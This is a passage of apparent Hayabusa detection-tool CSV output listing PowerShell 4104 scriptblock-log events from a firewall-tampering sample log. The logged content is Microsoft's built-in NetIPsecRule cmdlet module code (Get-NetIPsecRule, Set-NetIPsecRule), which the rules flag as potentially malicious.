[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName ))",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName ))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{ $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 